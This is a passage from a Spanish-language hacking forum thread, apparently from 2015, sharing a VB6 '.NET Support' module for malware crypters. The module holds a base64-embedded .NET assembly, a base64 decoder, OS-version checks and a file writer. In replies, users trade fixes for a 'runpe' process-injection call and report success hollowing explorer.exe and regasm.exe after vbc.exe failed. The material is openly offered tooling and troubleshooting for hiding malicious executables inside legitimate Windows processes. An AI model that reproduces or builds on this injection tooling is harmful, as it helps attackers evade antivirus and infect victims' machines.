"cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dhYmxlQXR0cmlidXRlAERlYnVnZ2luZ01vZGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBDb25zb2xlAFdyaXRlTGluZQAAAAAAF0gAZQBsAGwAbwAgAFcAbwByAGwAZAAAAAAAcRj6s6gT" & _ "PUGVpCQKuSHEXwAIt3pcVhk04IkFAAEBHQ4DIAABBCABAQ4EIAEBAgUgAQERQQQgAQEIBAABAQ5HAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjABAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEC5ORVQgRnJhbWV3b3JrIDQPAQAKSGVsbG9Xb3JsZAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxMwAAKQEAJDY0MzU0NzZjLTkzMzUtNGM1OC05ZWM3LTRiMmM5MThi" & _ "MjU0MQAADAEABzEuMC4wLjAAAAgBAAIAAAAAAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAAAAqxQrUgAAAAACAAAAggAAAJQmAACUCAAAUlNEU+4A+KOD3kFCj0ForkPgGlcCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAQCcAAAAAAAAAAAAAXicAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAnAAAAAAAAAAAAAAAAAAAAAF9Db3JFeGVNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAYAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAADqAQAAAAAAAAAAAADvu788P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ieWVzIj8+DQo8YXNzZW1ibHkgeG1sbnM9InVybjpz" & _ "Y2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4wLjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJp" & _ "dmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMiPg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlBY2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5Pg0KAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAIAAADAAAAHA3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" Case Else: sData = "" End Select ' Decode the data If sData <> "" Then getDummiNET = DecodeB64(sData) Else getDummiNET = "" End If End Function ' Get the Windows OS version Public Function GetWindowsVersion() As String On Error GoTo ErrorHandler Dim OperatingSystemSet As Object Dim OS As Object Dim sVersion As String Set OperatingSystemSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_OperatingSystem") For Each OS In OperatingSystemSet sVersion = Left$(Trim$(OS.version), 3) Next Select Case sVersion Case "5.1": GetWindowsVersion = "XP" Case "5.2": GetWindowsVersion = "Server 2003/Server 2003 R2" Case "6.0": GetWindowsVersion = "Vista/Server 2008" Case "6.1": GetWindowsVersion = "7/Server 2008 R2" Case "6.2": GetWindowsVersion = "8/Server 2012" Case "6.3": GetWindowsVersion = "8.1/Server 2012 R2" Case Else: GetWindowsVersion = "" End Select Exit Function ErrorHandler: End Function ' Get the Windows OS architecture Public Function GetOsBitness() As String Dim ProcessorSet As Object Dim CPU As Object Set ProcessorSet = GetObject("winmgmts:").ExecQuery("SELECT * FROM Win32_Processor") For Each CPU In ProcessorSet GetOsBitness = CStr(CPU.AddressWidth) Next End Function ' Verify if a file exists Public Function FileExist(sFileName As String) As Boolean On Error GoTo ErrorHandler Call FileLen(sFileName) FileExist = True Exit Function ErrorHandler: FileExist = False End Function ' Write some data (in string form) to a file Public Function WriteFile(sPath As String, sData As String) As Boolean On Error GoTo ErrorHandler Dim FF As Long FF = FreeFile Open sPath For Binary As FF Put FF, , sData Close FF WriteFile = FileExist(sPath) Exit Function ErrorHandler: WriteFile = False End Function ' Decode a Base64 string Public Function DecodeB64(ByVal strData As String) As String Dim objXML As Object Dim objNode As Object Set objXML = CreateObject("MSXML2.DOMDocument") Set objNode = objXML.createElement("b64") objNode.DataType = "bin.base64" objNode.Text = strData DecodeB64 = StrConv(objNode.nodeTypedValue, vbUnicode) Set objNode = Nothing Set objXML = Nothing End Function ' Search one string in another one Public Function Contains(ByVal Source As String, ByVal find As String) As Boolean On Error GoTo ErrorHandler Contains = InStr(1, Source, find) <> 0 ErrorHandler: End Function[/LENGUAJE][/HIDE-THANKS] Link to comment Share on other sites More sharing options...
psyco? Posted March 15, 2015 Share Posted March 15, 2015 Re: .NET Support Hice un pequeño cambio, pero nada demasiado. This is the hidden content, please Sign In or Sign Up así que cambié a: This is the hidden content, please Sign In or Sign Up como siempre haciendo el bien contenido. Link to comment Share on other sites More sharing options...
chequinho Posted March 16, 2015 Author Share Posted March 16, 2015 Re: .NET Support Hice un pequeño cambio, pero nada demasiado. This is the hidden content, please Sign In or Sign Up así que cambié a: This is the hidden content, please Sign In or Sign Up como siempre haciendo el bien contenido. Muy bien bro, en su momento lo pensé modificar pero deshabilitaron la edición de hilos y pues no me gusta hacer dobles post. Gracias por la modificación. Link to comment Share on other sites More sharing options...
top10 Posted June 23, 2015 Share Posted June 23, 2015 Re: .NET Support Como se implementaria? call vbcPath(2) o call vbcPath(4) no funciona. He probado a cmbiar la direcion del call runpe como Environ("windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe" y sVbc2 pero no funciona,alguna ayuda?gracias por adelantado Link to comment Share on other sites More sharing options...
chequinho Posted June 24, 2015 Author Share Posted June 24, 2015 Re: .NET Support Como se implementaria? call vbcPath(2) o call vbcPath(4) no funciona. He probado a cmbiar la direcion del call runpe como Environ("windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe" y sVbc2 pero no funciona,alguna ayuda?gracias por adelantado Ve el Sub Main, ahí está la forma de implementación Saludos. Link to comment Share on other sites More sharing options...
top10 Posted July 6, 2015 Share Posted July 6, 2015 Re: .NET Support Gracias chequinho vi el sub main de implementacion pero intente implementarlo de manera directa cambiando la llamada al runpe para entender como funciona para luego implementarlo pero lo he intentado de varias maneras y sigue sin funcionar.El tipo de cambio que hize fue como: call runpe App.Path & "\" & App.EXEName & ".exe", StrConv(split(freefile), vbFromUnicode) por esta otra, call runpe Environ("windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe", StrConv(split(freefile), vbFromUnicode) Por lo que entiendo que hace tu codigo es cambiar la inyeccion del runpe en otro ejecutable,con otros si me funciona como por ejemplo call runpe Environ("windir") & "\" & "explorer.exe", StrConv(split(freefile), vbFromUnicode) pero no con las de vbc.exe que siempre rompen o directamente no ejecuta,un saludo. Link to comment Share on other sites More sharing options...
top10 Posted July 16, 2015 Share Posted July 16, 2015 Re: .NET Support Ya consegui solucionar el problema, al final cambie vbc.exe por regasm.exe porque el otro me daba problemas en algunos sistemas operativos,un saludo a todos. Link to comment Share on other sites More sharing options...
.webp.8407a83ac96563f75e1c428a1f0d4c3e.webp)
.webp.9a04cec050a656fab081ac190f971c3f.webp)
Hack Tools Resurrection
Recommended Posts